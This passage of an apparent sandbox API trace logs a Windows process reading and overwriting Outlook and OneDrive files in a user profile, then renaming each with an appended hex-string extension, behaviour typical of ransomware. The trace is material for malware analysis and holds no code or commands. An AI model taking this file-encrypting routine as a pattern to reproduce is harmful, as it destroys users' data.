(FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x42f0a98, Length=0x1d6, FileInformationClass=0xa) returned 0x0 [0159.671] CloseHandle (hObject=0x58c) returned 1 [0159.674] GetProcessHeap () returned 0x270000 [0159.675] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.682] RtlInterlockedCompareExchange64 () returned 0x1 [0159.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.691] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.691] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.693] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.694] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2=".A37F61B4DD4A14D713881A464EF5A841101EB4F9042828D20C6C773580AE7A5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat.A37F61B4DD4A14D713881A464EF5A841101EB4F9042828D20C6C773580AE7A5E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat.A37F61B4DD4A14D713881A464EF5A841101EB4F9042828D20C6C773580AE7A5E" [0159.694] GetProcessHeap () returned 0x270000 [0159.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1da) returned 0x741a3b8 [0159.694] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x741a3b8, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0159.696] CloseHandle (hObject=0x58c) returned 1 [0159.760] GetProcessHeap () returned 0x270000 [0159.762] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.762] RtlInterlockedCompareExchange64 () returned 0x1 [0159.762] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 
1 [0159.768] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.770] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.776] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.779] RtlInterlockedCompareExchange64 () returned 0x0 [0159.779] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.781] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.782] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2=".7D920B21389021953A1619A128B97E835ECA95CCC26D920C686DAAC0303F626C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat.7D920B21389021953A1619A128B97E835ECA95CCC26D920C686DAAC0303F626C") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat.7D920B21389021953A1619A128B97E835ECA95CCC26D920C686DAAC0303F626C" [0159.782] GetProcessHeap () returned 0x270000 [0159.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1da) returned 0x741a5a0 [0159.783] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x741a5a0, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0159.784] CloseHandle (hObject=0x58c) returned 1 [0159.787] GetProcessHeap () returned 0x270000 [0159.790] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.790] RtlInterlockedCompareExchange64 () returned 0x1 [0159.790] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.828] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.829] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.830] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.831] RtlInterlockedCompareExchange64 () returned 0x0 [0159.831] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, 
lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.832] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0159.833] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll", lpString2=".ED843DE4B58279FD7A2BCF677CCC547DD541A236DE34493B0B15BCE456633834" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll.ED843DE4B58279FD7A2BCF677CCC547DD541A236DE34493B0B15BCE456633834") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll.ED843DE4B58279FD7A2BCF677CCC547DD541A236DE34493B0B15BCE456633834" [0159.833] GetProcessHeap () returned 0x270000 [0159.833] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x174) returned 0x427a6e0 [0159.833] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x427a6e0, Length=0x174, FileInformationClass=0xa) returned 0x0 [0159.835] CloseHandle (hObject=0x590) returned 1 [0159.847] GetProcessHeap () returned 0x270000 [0159.849] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.852] RtlInterlockedCompareExchange64 () returned 0x1 [0159.852] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.856] ReadFile (in: hFile=0x5ac, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0159.857] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.858] WriteFile (in: hFile=0x5ac, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0159.859] RtlInterlockedCompareExchange64 () returned 0x0 [0159.859] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.862] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.866] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.874] RtlInterlockedCompareExchange64 () returned 0x1 [0159.874] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.921] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0159.922] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll", lpString2=".CC858FC81B363B780454B09412E256A0BC645E3639CF04CE1758C4BCF70B4365" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll.CC858FC81B363B780454B09412E256A0BC645E3639CF04CE1758C4BCF70B4365") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll.CC858FC81B363B780454B09412E256A0BC645E3639CF04CE1758C4BCF70B4365" [0159.922] GetProcessHeap () returned 0x270000 [0159.922] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x17c) returned 0x3467b0 [0159.922] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x3467b0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0159.923] CloseHandle (hObject=0x590) returned 1 [0159.929] GetProcessHeap () returned 0x270000 [0159.932] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.938] RtlInterlockedCompareExchange64 () returned 0x1 [0159.938] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.945] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.946] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0160.049] WriteFile (in: hFile=0x5ac, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.076] RtlInterlockedCompareExchange64 () returned 0x3 [0160.076] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0160.078] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74723c8, ReturnLength=0x723f8ec) returned 0x0 [0160.079] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png", lpString2=".E211B8DF81BC1518F9C905546F216ECDAF714461BF0277F65EFA141522C0300B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png.E211B8DF81BC1518F9C905546F216ECDAF714461BF0277F65EFA141522C0300B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png.E211B8DF81BC1518F9C905546F216ECDAF714461BF0277F65EFA141522C0300B" [0160.079] GetProcessHeap () returned 0x270000 [0160.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7420370 [0160.079] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x723f8dc, 
FileInformation=0x7420370, Length=0x168, FileInformationClass=0xa) returned 0x0 [0160.086] CloseHandle (hObject=0x5b4) returned 1 [0160.175] GetProcessHeap () returned 0x270000 [0160.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0160.178] RtlInterlockedCompareExchange64 () returned 0x4 [0160.178] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0160.586] WriteFile (in: hFile=0x5ac, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.793] RtlInterlockedCompareExchange64 () returned 0x4 [0160.793] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0161.036] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7532378, ReturnLength=0x723f8ec) returned 0x0 [0161.038] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll", lpString2=".A67D6DDC19258FF69185EA56E93D7E6A3B42267BD686CF93396996B7F09C5A7F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll.A67D6DDC19258FF69185EA56E93D7E6A3B42267BD686CF93396996B7F09C5A7F") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll.A67D6DDC19258FF69185EA56E93D7E6A3B42267BD686CF93396996B7F09C5A7F" [0161.038] GetProcessHeap () returned 0x270000 [0161.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x3282a8 [0161.038] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x723f8dc, FileInformation=0x3282a8, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0161.047] CloseHandle (hObject=0x594) returned 1 [0161.422] GetProcessHeap () returned 0x270000 [0161.424] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0161.432] RtlInterlockedCompareExchange64 () returned 0x2 [0161.433] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.106] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0162.107] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.111] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.272] RtlInterlockedCompareExchange64 () returned 0x0 [0162.272] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.328] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.329] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll", lpString2=".5658482A41570D119EA4A8A5B2B685ADCE59C307F4431A2A47D59618939E7A1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll.5658482A41570D119EA4A8A5B2B685ADCE59C307F4431A2A47D59618939E7A1A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll.5658482A41570D119EA4A8A5B2B685ADCE59C307F4431A2A47D59618939E7A1A" [0162.329] GetProcessHeap () returned 0x270000 [0162.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7420950 [0162.329] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x7420950, Length=0x166, FileInformationClass=0xa) returned 0x0 [0162.332] CloseHandle (hObject=0x5b8) returned 1 [0162.403] GetProcessHeap () returned 0x270000 [0162.405] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0162.405] RtlInterlockedCompareExchange64 () returned 0x1 [0162.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.431] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.431] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.440] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0162.440] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.454] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.466] RtlInterlockedCompareExchange64 () returned 0x0 [0162.466] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.469] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.470] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll", lpString2=".C453B1C8F703019B82019A77EE70E4E23C5765C2AF696B04F6E12964EBF7A81D" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll.C453B1C8F703019B82019A77EE70E4E23C5765C2AF696B04F6E12964EBF7A81D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll.C453B1C8F703019B82019A77EE70E4E23C5765C2AF696B04F6E12964EBF7A81D" [0162.471] GetProcessHeap () returned 0x270000 [0162.471] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x328710 [0162.471] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x328710, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0162.473] CloseHandle (hObject=0x5b8) returned 1 [0162.503] GetProcessHeap () returned 0x270000 [0162.504] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0162.504] RtlInterlockedCompareExchange64 () returned 0x1 [0162.504] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.509] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0162.510] RtlInterlockedCompareExchange64 () returned 0x0 [0162.510] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.525] ReadFile (in: hFile=0x5ac, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, 
